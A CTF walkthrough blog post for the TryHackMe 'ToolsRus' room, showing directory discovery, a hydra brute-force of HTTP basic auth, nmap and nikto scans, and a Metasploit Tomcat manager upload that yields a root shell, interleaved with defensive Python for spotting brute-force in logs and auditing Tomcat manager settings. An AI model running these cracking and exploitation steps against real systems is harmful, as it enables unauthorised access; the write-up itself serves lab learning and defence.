TryHackMe: ToolsRus

ratiros01
4 min read · Mar 10, 2020


[Task 1] ToolsRus

1. What directory can you find, that begins with a g?
   - Open DirBuster
   - Input the target URL and wordlist
   - Click Start and wait

Open /guidelines/

http://<ip>/guidelines/

2. Whose name can you find from this directory? It’s in #1.

3. What directory has basic authentication?

4. What is bob’s password to the protected part of the website?
I used hydra to crack the password with the http-get form.

hydra -l bob -P /root/Desktop/rockyou.txt -f 10.10.176.108 http-get /protected/

Try to log in with the cracked credentials.
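On the defensive side, a hydra run like the one above is easy to spot: every rejected Basic-auth guess is a 401 in the web server's access log, from one source address, against one path, at machine speed, followed by a single 200 once a password matches. The Python below is an added example of mine, not part of the room or this write-up; the log lines are constructed for illustration, and the threshold and window values are assumptions you would tune for your own site.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" log format. The third field is the authenticated user:
# '-' on a rejected Basic-auth attempt, the username once the server accepts one.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample: six rejected guesses from one address in six seconds,
# then an accepted login as bob; a second address with one ordinary typo.
SAMPLE_LOG = [
    f'10.0.0.5 - - [10/Mar/2020:10:00:0{s} +0000] "GET /protected/ HTTP/1.1" 401 381 "-" "Mozilla/5.0"'
    for s in range(6)
] + [
    '10.0.0.5 - bob [10/Mar/2020:10:00:06 +0000] "GET /protected/ HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Mar/2020:10:05:00 +0000] "GET /protected/ HTTP/1.1" 401 381 "-" "Mozilla/5.0"',
    '10.0.0.9 - alice [10/Mar/2020:10:05:04 +0000] "GET /protected/ HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]


def parse_line(line):
    """Return a dict for one combined-format access log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def find_basic_auth_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Flag (ip, path) pairs with `threshold` or more 401s inside `window`,
    and record the user of any 200 to the same path after the last failure
    (that is the sign the guessing succeeded)."""
    attempts = defaultdict(list)   # (ip, path) -> timestamps of 401s
    successes = defaultdict(list)  # (ip, path) -> (timestamp, user) of 200s
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        key = (rec["ip"], rec["path"])
        if rec["status"] == 401:
            attempts[key].append(rec["ts"])
        elif rec["status"] == 200:
            successes[key].append((rec["ts"], rec["user"]))

    findings = []
    for key, stamps in attempts.items():
        stamps.sort()
        # Sliding window: the largest number of failures that fit in `window`.
        start, peak = 0, 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak < threshold:
            continue
        last_fail = stamps[-1]
        later = [(ts, u) for ts, u in successes.get(key, []) if ts >= last_fail]
        findings.append({
            "ip": key[0],
            "path": key[1],
            "failures": len(stamps),
            "peak_in_window": peak,
            "compromised_user": later[0][1] if later else None,
        })
    return findings


if __name__ == "__main__":
    for f in find_basic_auth_bruteforce(SAMPLE_LOG):
        print(f)
```

A finding whose `compromised_user` is not `None` is the one to act on first: the password for that account was guessed, so it needs resetting, not just the source address blocked. Rate limiting on the protected path (or fail2ban on these 401 bursts) stops the wordlist from finishing in the first place.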

5. What other port that serves a web service is open on the machine?
Find open ports

nmap -Pn 10.10.176.108

Identify the services

nmap -sV -T 4 10.10.176.108

6. Going to the service running on that port, what is the name and version of the software?

nmap -sV -A -T 4 10.10.176.108

Access the Tomcat site on port 1234

7. Use Nikto with the credentials you have found and scan the /manager/html directory on the port found above.
How many documentation files did Nikto identify?

Click Manager App

Try with the credentials

Let’s scan the site

nikto -h http://10.10.131.147:1234/manager/html -id bob:<password>

8. What is the server version (run the scan against port 80)?

9. What version of Apache-Coyote is this service using?
Answer is in #8.

10. Use Metasploit to exploit the service and get a shell on the system.
What user did you get a shell as?

msfconsole
search tomcat

There are 3 exploits that I can use.

I tried to use #13 and #14, but they didn’t work. I’ll skip to #15.

Note: Metasploit is updated from time to time, so the module is not always #15.

use 15

or

use exploit/multi/http/tomcat_mgr_upload
show options
set HttpPassword <password>
set HttpUsername bob
set RHOSTS <ip>
set RPORT 1234
run

Let’s get a shell

shell
whoami

Now I’m root.
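The reason tomcat_mgr_upload works here is configuration, not a software bug: a user with a manager role and a guessable password, and a /manager application reachable from any address (stock Tomcat ships the RemoteAddrValve in the manager's context.xml commented out). The Python below is an added example of mine, not code from the room or this write-up; it audits a constructed tomcat-users.xml and two constructed manager context.xml files (placeholder passwords, not the room's) and reports the conditions that let the module deploy a WAR.

```python
import xml.etree.ElementTree as ET

# Roles that grant access to the Tomcat Manager application. manager-gui and
# manager-script are the ones that can deploy a WAR, i.e. run code as the
# Tomcat process.
DEPLOY_ROLES = {"manager-gui", "manager-script"}
MANAGER_ROLES = DEPLOY_ROLES | {"manager-jmx", "manager-status"}

# Constructed conf/tomcat-users.xml resembling the weak setup in the room
# (placeholder passwords, not the real ones).
TOMCAT_USERS_XML = """\
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <role rolename="manager-status"/>
  <user username="bob" password="PLACEHOLDER_PASSWORD" roles="manager-gui,manager-script"/>
  <user username="monitor" password="PLACEHOLDER_PASSWORD_2" roles="manager-status"/>
</tomcat-users>
"""

# Constructed webapps/manager/META-INF/context.xml with no address filter.
OPEN_CONTEXT_XML = """\
<Context antiResourceLocking="false" privileged="true">
</Context>
"""

# The same file with the RemoteAddrValve enabled and limited to loopback.
HARDENED_CONTEXT_XML = r"""<Context antiResourceLocking="false" privileged="true">
  <Valve className="org.apache.catalina.valves.RemoteAddrValve"
         allow="127\.\d+\.\d+\.\d+|::1|0:0:0:0:0:0:0:1" />
</Context>
"""


def _local(tag):
    """Strip the XML namespace from an element tag."""
    return tag.rsplit("}", 1)[-1]


def manager_accounts(users_xml):
    """List every user holding a manager role, with whether it can deploy."""
    accounts = []
    for el in ET.fromstring(users_xml).iter():
        if _local(el.tag) != "user":
            continue
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        held = roles & MANAGER_ROLES
        if held:
            accounts.append({
                "username": el.get("username"),
                "roles": sorted(held),
                "can_deploy": bool(roles & DEPLOY_ROLES),
            })
    return accounts


def manager_address_filter(context_xml):
    """Return the RemoteAddrValve 'allow' pattern, or None if there is none."""
    for el in ET.fromstring(context_xml).iter("Valve"):
        if el.get("className", "").endswith(".RemoteAddrValve"):
            return el.get("allow")
    return None


def audit(users_xml, context_xml):
    """Report the conditions that let a remote user deploy through /manager."""
    findings = []
    for acct in manager_accounts(users_xml):
        if acct["can_deploy"]:
            findings.append(
                f"account '{acct['username']}' holds {acct['roles']} and can "
                "deploy a WAR, which runs code as the Tomcat process"
            )
    if manager_address_filter(context_xml) is None:
        findings.append(
            "manager app has no RemoteAddrValve: /manager is reachable from any address"
        )
    return findings


if __name__ == "__main__":
    for label, ctx in (("open", OPEN_CONTEXT_XML), ("hardened", HARDENED_CONTEXT_XML)):
        print(label)
        for finding in audit(TOMCAT_USERS_XML, ctx):
            print("  -", finding)
```

Even with both findings fixed, the shell in this room came back as root because the service itself ran as root; running Tomcat under an unprivileged service account limits what a successful upload hands over.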

11. What text is in the file /root/flag.txt?

cd /root
ls
cat flag.txt
